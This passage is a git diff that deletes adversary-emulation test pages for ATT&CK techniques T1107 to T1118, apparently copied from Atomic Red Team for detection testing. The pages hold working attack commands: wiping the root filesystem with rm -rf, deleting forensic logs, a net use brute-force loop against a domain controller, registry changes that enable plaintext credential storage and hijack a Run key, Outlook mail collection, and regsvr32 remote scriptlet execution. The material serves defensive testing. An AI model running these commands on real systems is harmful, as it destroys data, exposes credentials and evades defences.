-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| folder_to_delete | Folder to delete. Run the prereq command to create it if it does not exist. | string | %temp%&#92;deleteme_T1107|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-rmdir /s /q #{folder_to_delete}
-```
-
-
-
-
-#### Dependencies:  Run with `command_prompt`!
-##### Description: The file to delete must exist on disk at specified location (#{folder_to_delete})
-##### Check Prereq Commands:
-```cmd
-IF EXIST "#{folder_to_delete}" ( EXIT 0 ) ELSE ( EXIT 1 ) 
-```
-##### Get Prereq Commands:
-```cmd
-mkdir #{folder_to_delete}
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #6 - Delete a single file - Windows PowerShell
-Delete a single file from the temporary directory using Powershell. Upon execution, no output will be displayed. Use File Explorer to verify the file was deleted.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| file_to_delete | File to delete. Run the prereq command to create it if it does not exist. | string | $env:TEMP&#92;deleteme_T1107|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-Remove-Item -path #{file_to_delete}
-```
-
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: The file to delete must exist on disk at specified location (#{file_to_delete})
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{file_to_delete}) {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -Path #{file_to_delete} | Out-Null
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #7 - Delete an entire folder - Windows PowerShell
-Recursively delete a folder in the temporary directory using Powershell. Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| folder_to_delete | Folder to delete. Run the prereq command to create it if it does not exist. | string | $env:TEMP&#92;deleteme_folder_T1107|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-Remove-Item -Path #{folder_to_delete} -Recurse
-```
-
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: The folder to delete must exist on disk at specified location (#{folder_to_delete})
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{folder_to_delete}) {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -Path #{folder_to_delete} -Type Directory | Out-Null
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #8 - Delete Filesystem - Linux
-This test deletes the entire root filesystem of a Linux system. This technique was used by Amnesia IoT malware to avoid analysis. This test is dangerous and destructive, do NOT use on production equipment.
-
-**Supported Platforms:** Linux
-
-
-
-
-
-#### Attack Commands: Run with `bash`! 
-
-
-```bash
-rm -rf / --no-preserve-root > /dev/null 2> /dev/null
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #9 - Delete-PrefetchFile
-Delete a single prefetch file.  Deletion of prefetch files is a known anti-forensic technique. To verify execution, Run "(Get-ChildItem -Path "$Env:SystemRoot\prefetch\*.pf" | Measure-Object).Count"
-before and after the test to verify that the number of prefetch files decreases by 1.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
-
-```powershell
-Remove-Item -Path (Join-Path "$Env:SystemRoot\prefetch\" (Get-ChildItem -Path "$Env:SystemRoot\prefetch\*.pf" -Name)[0])
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #10 - Delete TeamViewer Log Files
-Adversaries may delete TeamViewer log files to hide activity. This should provide a high true-positive alert ration.
-This test just places the files in a non-TeamViewer folder, a detection would just check for a deletion event matching the TeamViewer
-log file format of TeamViewer_##.log. Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted.
-
-https://twitter.com/SBousseaden/status/1197524463304290305?s=20
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| teamviewer_log_file | Teamviewer log file to delete. Run the prereq command to create it if it does not exist. | string | $env:TEMP&#92;TeamViewer_54.log|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-Remove-Item #{teamviewer_log_file}
-```
-
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: The folder to delete must exist on disk at specified location (#{teamviewer_log_file})
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{teamviewer_log_file}) {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -Path #{teamviewer_log_file} | Out-Null
-```
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1110.md b/Atomic_Threat_Coverage/Triggers/T1110.md
deleted file mode 100644
index 8647127..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1110.md
+++ /dev/null
@@ -1,71 +0,0 @@
-# T1110 - Brute Force
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1110)
-<blockquote>Adversaries may use brute force techniques to attempt access to accounts when passwords are unknown or when password hashes are obtained.
-
-[Credential Dumping](https://attack.mitre.org/techniques/T1003) is used to obtain password hashes, this may only get an adversary so far when [Pass the Hash](https://attack.mitre.org/techniques/T1075) is not an option. Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table to crack hashes. Cracking hashes is usually done on adversary-controlled systems outside of the target network. (Citation: Wikipedia Password cracking)
-
-Adversaries may attempt to brute force logins without knowledge of passwords or hashes during an operation either with zero knowledge or by attempting a list of known or possible passwords. This is a riskier option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies. (Citation: Cylance Cleaver)
-
-A related technique called password spraying uses one password (e.g. 'Password01'), or a small list of passwords, that matches the complexity policy of the domain and may be a commonly used password. Logins are attempted with that password and many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)
-
-Typically, management services over commonly used ports are used when password spraying. Commonly targeted services include the following:
-
-* SSH (22/TCP)
-* Telnet (23/TCP)
-* FTP (21/TCP)
-* NetBIOS / SMB / Samba (139/TCP & 445/TCP)
-* LDAP (389/TCP)
-* Kerberos (88/TCP)
-* RDP / Terminal Services (3389/TCP)
-* HTTP/HTTP Management Services (80/TCP & 443/TCP)
-* MSSQL (1433/TCP)
-* Oracle (1521/TCP)
-* MySQL (3306/TCP)
-* VNC (5900/TCP)
-
-In addition to management services, adversaries may "target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols," as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018)
-
-
-In default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows "logon failure" event ID 4625.</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Brute Force Credentials](#atomic-test-1---brute-force-credentials)
-
-
-<br/>
-
-## Atomic Test #1 - Brute Force Credentials
-Creates username and password files then attempts to brute force on remote host
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| input_file_users | Path to a file containing a list of users that we will attempt to brute force | Path | DomainUsers.txt|
-| input_file_passwords | Path to a file containing a list of passwords we will attempt to brute force with | Path | passwords.txt|
-| remote_host | Hostname of the target system we will brute force upon | String | &#92;&#92;COMPANYDC1&#92;IPC$|
-| domain | Domain name of the target system we will brute force upon | String | YOUR_COMPANY|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-net user /domain > #{input_file_users}
-echo "Password1" >> #{input_file_passwords}
-echo "1q2w3e4r" >> #{input_file_passwords}
-echo "Password!" >> #{input_file_passwords}
-@FOR /F %n in (#{input_file_users}) DO @FOR /F %p in (#{input_file_passwords}) DO @net use #{remote_host} /user:#{domain}\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete #{remote_host} > NUL
-```
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1112.md b/Atomic_Threat_Coverage/Triggers/T1112.md
deleted file mode 100644
index 70d3a1e..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1112.md
+++ /dev/null
@@ -1,189 +0,0 @@
-# T1112 - Modify Registry
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1112)
-<blockquote>Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in Persistence and Execution.
-
-Access to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility [Reg](https://attack.mitre.org/software/S0075) may be used for local or remote Registry modification. (Citation: Microsoft Reg) Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API (see examples).
-
-Registry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via [Reg](https://attack.mitre.org/software/S0075) or other utilities using the Win32 API. (Citation: Microsoft Reghide NOV 2006) Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to establish Persistence. (Citation: TrendMicro POWELIKS AUG 2014) (Citation: SpectorOps Hiding Reg Jul 2017)
-
-The Registry of a remote system may be modified to aid in execution of files as part of Lateral Movement. It requires the remote Registry service to be running on the target system. (Citation: Microsoft Remote) Often [Valid Accounts](https://attack.mitre.org/techniques/T1078) are required, along with access to the remote system's [Windows Admin Shares](https://attack.mitre.org/techniques/T1077) for RPC communication.</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Modify Registry of Current User Profile - cmd](#atomic-test-1---modify-registry-of-current-user-profile---cmd)
-
-- [Atomic Test #2 - Modify Registry of Local Machine - cmd](#atomic-test-2---modify-registry-of-local-machine---cmd)
-
-- [Atomic Test #3 - Modify registry to store logon credentials](#atomic-test-3---modify-registry-to-store-logon-credentials)
-
-- [Atomic Test #4 - Add domain to Trusted sites Zone](#atomic-test-4---add-domain-to-trusted-sites-zone)
-
-- [Atomic Test #5 - Javascript in registry](#atomic-test-5---javascript-in-registry)
-
-
-<br/>
-
-## Atomic Test #1 - Modify Registry of Current User Profile - cmd
-Modify the registry of the currently logged in user using reg.exe via cmd console. Upon execution, the message "The operation completed successfully."
-will be displayed. Additionally, open Registry Editor to view the new entry in HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
-
-```cmd
-reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /t REG_DWORD /v HideFileExt /d 1 /f
-```
-
-#### Cleanup Commands:
-```cmd
-reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v HideFileExt /f >nul 2>&1
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Modify Registry of Local Machine - cmd
-Modify the Local Machine registry RUN key to change Windows Defender executable that should be ran on startup.  This should only be possible when
-CMD is ran as Administrative rights. Upon execution, the message "The operation completed successfully."
-will be displayed. Additionally, open Registry Editor to view the modified entry in HKCU\Software\Microsoft\Windows\CurrentVersion\Run.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| new_executable | New executable to run on startup instead of Windows Defender | string | calc.exe|
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
-
-```cmd
-reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /t REG_EXPAND_SZ /v SecurityHealth /d #{new_executable} /f
-```
-
-#### Cleanup Commands:
-```cmd
-reg delete HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v SecurityHealth /f >nul 2>&1
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Modify registry to store logon credentials
-Sets registry key that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping).
-Upon execution, the message "The operation completed successfully." will be displayed.
-Additionally, open Registry Editor to view the modified entry in HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
-
-```cmd
-reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
-```
-
-#### Cleanup Commands:
-```cmd
-reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f >nul 2>&1
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - Add domain to Trusted sites Zone
-Attackers may add a domain to the trusted site zone to bypass defenses. Doing this enables attacks such as c2 over office365.
-Upon execution, details of the new registry entries will be displayed.
-Additionally, open Registry Editor to view the modified entry in HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\.
-
-https://www.blackhat.com/docs/us-17/wednesday/us-17-Dods-Infecting-The-Enterprise-Abusing-Office365-Powershell-For-Covert-C2.pdf
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| bad_domain | Domain to add to trusted site zone | String | bad-domain.com|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-$key= "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\#{bad_domain}\"
-$name ="bad-subdomain"
-new-item $key -Name $name -Force
-new-itemproperty $key$name -Name https -Value 2 -Type DWORD;
-new-itemproperty $key$name -Name http  -Value 2 -Type DWORD;
-new-itemproperty $key$name -Name *     -Value 2 -Type DWORD;
-```
-
-#### Cleanup Commands:
-```powershell
-$key = "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\#{bad_domain}\"
-Remove-item  $key -Recurse -ErrorAction Ignore
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #5 - Javascript in registry
-Upon execution, a javascript block will be placed in the registry for persistence.
-Additionally, open Registry Editor to view the modified entry in HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-New-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings" -Name T1112 -Value "<script>"
-```
-
-#### Cleanup Commands:
-```powershell
-Remove-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings" -Name T1112 -ErrorAction Ignore
-```
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1113.md b/Atomic_Threat_Coverage/Triggers/T1113.md
deleted file mode 100644
index 19e131e..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1113.md
+++ /dev/null
@@ -1,156 +0,0 @@
-# T1113 - Screen Capture
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1113)
-<blockquote>Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations.
-
-### Mac
-
-On OSX, the native command <code>screencapture</code> is used to capture screenshots.
-
-### Linux
-
-On Linux, there is the native command <code>xwd</code>. (Citation: Antiquated Mac Malware)</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Screencapture](#atomic-test-1---screencapture)
-
-- [Atomic Test #2 - Screencapture (silent)](#atomic-test-2---screencapture-silent)
-
-- [Atomic Test #3 - X Windows Capture](#atomic-test-3---x-windows-capture)
-
-- [Atomic Test #4 - Import](#atomic-test-4---import)
-
-
-<br/>
-
-## Atomic Test #1 - Screencapture
-Use screencapture command to collect a full desktop screenshot
-
-**Supported Platforms:** macOS
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| output_file | Output file path | Path | /tmp/T1113_desktop.png|
-
-
-#### Attack Commands: Run with `bash`! 
-
-
-```bash
-screencapture #{output_file}
-```
-
-#### Cleanup Commands:
-```bash
-rm #{output_file}
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Screencapture (silent)
-Use screencapture command to collect a full desktop screenshot
-
-**Supported Platforms:** macOS
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| output_file | Output file path | Path | /tmp/T1113_desktop.png|
-
-
-#### Attack Commands: Run with `bash`! 
-
-
-```bash
-screencapture -x #{output_file}
-```
-
-#### Cleanup Commands:
-```bash
-rm #{output_file}
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - X Windows Capture
-Use xwd command to collect a full desktop screenshot and review file with xwud
-
-**Supported Platforms:** Linux
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| output_file | Output file path | Path | /tmp/T1113_desktop.xwd|
-
-
-#### Attack Commands: Run with `bash`! 
-
-
-```bash
-xwd -root -out #{output_file}
-xwud -in #{output_file}
-```
-
-#### Cleanup Commands:
-```bash
-rm #{output_file}
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - Import
-Use import command to collect a full desktop screenshot
-
-**Supported Platforms:** Linux
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| output_file | Output file path | Path | /tmp/T1113_desktop.png|
-
-
-#### Attack Commands: Run with `bash`! 
-
-
-```bash
-import -window root #{output_file}
-```
-
-#### Cleanup Commands:
-```bash
-rm #{output_file}
-```
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1114.md b/Atomic_Threat_Coverage/Triggers/T1114.md
deleted file mode 100644
index d281cf1..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1114.md
+++ /dev/null
@@ -1,52 +0,0 @@
-# T1114 - Email Collection
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1114)
-<blockquote>Adversaries may target user email to collect sensitive information from a target.
-
-Files containing email data can be acquired from a user's system, such as Outlook storage or cache files .pst and .ost.
-
-Adversaries may leverage a user's credentials and interact directly with the Exchange server to acquire information from within a network. Adversaries may also access externally facing Exchange services or Office 365 to access email using credentials or access tokens. Tools such as [MailSniper](https://attack.mitre.org/software/S0413) can be used to automate searches for specific key words.(Citation: Black Hills MailSniper, 2017)
-
-### Email Forwarding Rule
-
-Adversaries may also abuse email-forwarding rules to monitor the activities of a victim, steal information, and further gain intelligence on the victim or the victim’s organization to use as part of further exploits or operations.(Citation: US-CERT TA18-068A 2018) Outlook and Outlook Web App (OWA) allow users to create inbox rules for various email functions, including forwarding to a different recipient. Messages can be forwarded to internal or external recipients, and there are no restrictions limiting the extent of this rule. Administrators may also create forwarding rules for user accounts with the same considerations and outcomes.(Citation: TIMMCMIC, 2014)
-
-Any user or administrator within the organization (or adversary with valid credentials) can create rules to automatically forward all received messages to another recipient, forward emails to different locations based on the sender, and more. </blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - T1114 Email Collection with PowerShell](#atomic-test-1---t1114-email-collection-with-powershell)
-
-
-<br/>
-
-## Atomic Test #1 - T1114 Email Collection with PowerShell
-Search through local Outlook installation, extract mail, compress the contents, and saves everything to a directory for later exfiltration.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| output_file | Output file path | String | $home&#92;desktop&#92;mail.csv|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-powershell -executionpolicy bypass -command $PathToAtomicsFolder\T1114\Get-Inbox.ps1 -file #{output_file}
-```
-
-#### Cleanup Commands:
-```cmd
-del #{output_file} >nul 2>&1
-```
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1115.md b/Atomic_Threat_Coverage/Triggers/T1115.md
deleted file mode 100644
index 78250a2..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1115.md
+++ /dev/null
@@ -1,74 +0,0 @@
-# T1115 - Clipboard Data
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1115)
-<blockquote>Adversaries may collect data stored in the Windows clipboard from users copying information within or between applications. 
-
-### Windows
-
-Applications can access clipboard data by using the Windows API. (Citation: MSDN Clipboard) 
-
-### Mac
-
-OSX provides a native command, <code>pbpaste</code>, to grab clipboard contents  (Citation: Operating with EmPyre).</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Utilize Clipboard to store or execute commands from](#atomic-test-1---utilize-clipboard-to-store-or-execute-commands-from)
-
-- [Atomic Test #2 - PowerShell](#atomic-test-2---powershell)
-
-
-<br/>
-
-## Atomic Test #1 - Utilize Clipboard to store or execute commands from
-Add data to clipboard to copy off or execute commands from.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-dir | clip
-echo "T1115" > %temp%\T1115.txt
-clip < %temp%\T1115.txt
-```
-
-#### Cleanup Commands:
-```cmd
-del %temp%\T1115.txt >nul 2>&1
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - PowerShell
-Utilize PowerShell to echo a command to clipboard and execute it
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-echo Get-Process | clip
-Get-Clipboard | iex
-```
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1117.md b/Atomic_Threat_Coverage/Triggers/T1117.md
deleted file mode 100644
index d81f927..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1117.md
+++ /dev/null
@@ -1,133 +0,0 @@
-# T1117 - Regsvr32
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1117)
-<blockquote>Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe can be used to execute arbitrary binaries. (Citation: Microsoft Regsvr32)
-
-Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of whitelists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe is also a Microsoft signed binary.
-
-Regsvr32.exe can also be used to specifically bypass process whitelisting using functionality to load COM scriptlets to execute DLLs under user permissions. Since regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. (Citation: LOLBAS Regsvr32) This variation of the technique is often referred to as a "Squiblydoo" attack and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov)
-
-Regsvr32.exe can also be leveraged to register a COM Object used to establish Persistence via [Component Object Model Hijacking](https://attack.mitre.org/techniques/T1122). (Citation: Carbon Black Squiblydoo Apr 2016)</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Regsvr32 local COM scriptlet execution](#atomic-test-1---regsvr32-local-com-scriptlet-execution)
-
-- [Atomic Test #2 - Regsvr32 remote COM scriptlet execution](#atomic-test-2---regsvr32-remote-com-scriptlet-execution)
-
-- [Atomic Test #3 - Regsvr32 local DLL execution](#atomic-test-3---regsvr32-local-dll-execution)
-
-
-<br/>
-
-## Atomic Test #1 - Regsvr32 local COM scriptlet execution
-Regsvr32.exe is a command-line program used to register and unregister OLE controls. Upon execution, calc.exe will be launched.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| filename | Name of the local file, include path. | Path | PathToAtomicsFolder&#92;T1117&#92;src&#92;RegSvr32.sct|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-regsvr32.exe /s /u /i:#{filename} scrobj.dll
-```
-
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: Regsvr32.sct must exist on disk at specified location (#{filename})
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{filename}) {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -Type Directory (split-path #{filename}) -ErrorAction ignore | Out-Null
-Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1117/src/RegSvr32.sct" -OutFile "#{filename}"
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Regsvr32 remote COM scriptlet execution
-Regsvr32.exe is a command-line program used to register and unregister OLE controls. This test may be blocked by windows defender; disable
-windows defender real-time protection to fix it. Upon execution, calc.exe will be launched.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| url | URL to hosted sct file | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/src/RegSvr32.sct|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-regsvr32.exe /s /u /i:#{url} scrobj.dll
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Regsvr32 local DLL execution
-Regsvr32.exe is a command-line program used to register and unregister OLE controls. Upon execution, calc.exe will be launched.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| dll_name | Name of DLL to Execute, DLL Should export DllRegisterServer | Path | PathToAtomicsFolder&#92;T1117&#92;bin&#92;AllTheThingsx86.dll|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe /s #{dll_name}) ELSE ( regsvr32.exe /s #{dll_name} )
-```
-
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: AllTheThingsx86.dll must exist on disk at specified location (#{dll_name})
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{dll_name}) {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -Type Directory (split-path #{dll_name}) -ErrorAction ignore | Out-Null
-Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1117/bin/AllTheThingsx86.dll" -OutFile "#{dll_name}"
-```
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1118.md b/Atomic_Threat_Coverage/Triggers/T1118.md
deleted file mode 100644
index 86dc19f..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1118.md
+++ /dev/null
@@ -1,645 +0,0 @@
-# T1118 - InstallUtil
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1118)
-<blockquote>InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) InstallUtil is located in the .NET directories on a Windows system: <code>C:\Windows\Microsoft.NET\Framework\v<version>\InstallUtil.exe</code> and <code>C:\Windows\Microsoft.NET\Framework64\v<version>\InstallUtil.exe</code>. InstallUtil.exe is digitally signed by Microsoft.
-
-Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil may also be used to bypass process whitelisting through use of attributes within the binary that execute the class decorated with the attribute <code>[System.ComponentModel.RunInstaller(true)]</code>. (Citation: LOLBAS Installutil)</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - CheckIfInstallable method call](#atomic-test-1---checkifinstallable-method-call)
-
-- [Atomic Test #2 - InstallHelper method call](#atomic-test-2---installhelper-method-call)
-
-- [Atomic Test #3 - InstallUtil class constructor method call](#atomic-test-3---installutil-class-constructor-method-call)
-
-- [Atomic Test #4 - InstallUtil Install method call](#atomic-test-4---installutil-install-method-call)
-
-- [Atomic Test #5 - InstallUtil Uninstall method call - /U variant](#atomic-test-5---installutil-uninstall-method-call---u-variant)
-
-- [Atomic Test #6 - InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant](#atomic-test-6---installutil-uninstall-method-call---installtypenotransaction-actionuninstall-variant)
-
-- [Atomic Test #7 - InstallUtil HelpText method call](#atomic-test-7---installutil-helptext-method-call)
-
-- [Atomic Test #8 - InstallUtil evasive invocation](#atomic-test-8---installutil-evasive-invocation)
-
-
-<br/>
-
-## Atomic Test #1 - CheckIfInstallable method call
-Executes the CheckIfInstallable class constructor runner instead of executing InstallUtil. Upon execution, the InstallUtil test harness will be executed.
-If no output is displayed the test executed successfuly.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| test_harness | location of the test harness script - Invoke-BuildAndInvokeInstallUtilAssembly | Path | PathToAtomicsFolder&#92;T1118&#92;src&#92;InstallUtilTestHarness.ps1|
-| assembly_dir | directory to drop the compiled installer assembly | Path | $Env:TEMP&#92;|
-| assembly_filename | filename of the compiled installer assembly | String | T1118.dll|
-| invocation_method | the type of InstallUtil invocation variant - Executable, InstallHelper, or CheckIfInstallable | String | CheckIfInstallable|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly
-. #{test_harness}
-
-$InstallerAssemblyDir = "#{assembly_dir}"
-$InstallerAssemblyFileName = "#{assembly_filename}"
-$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
-
-$ExpectedOutput = 'Constructor_'
-
-$TestArgs = @{
-    OutputAssemblyDirectory = $InstallerAssemblyDir
-    OutputAssemblyFileName = $InstallerAssemblyFileName
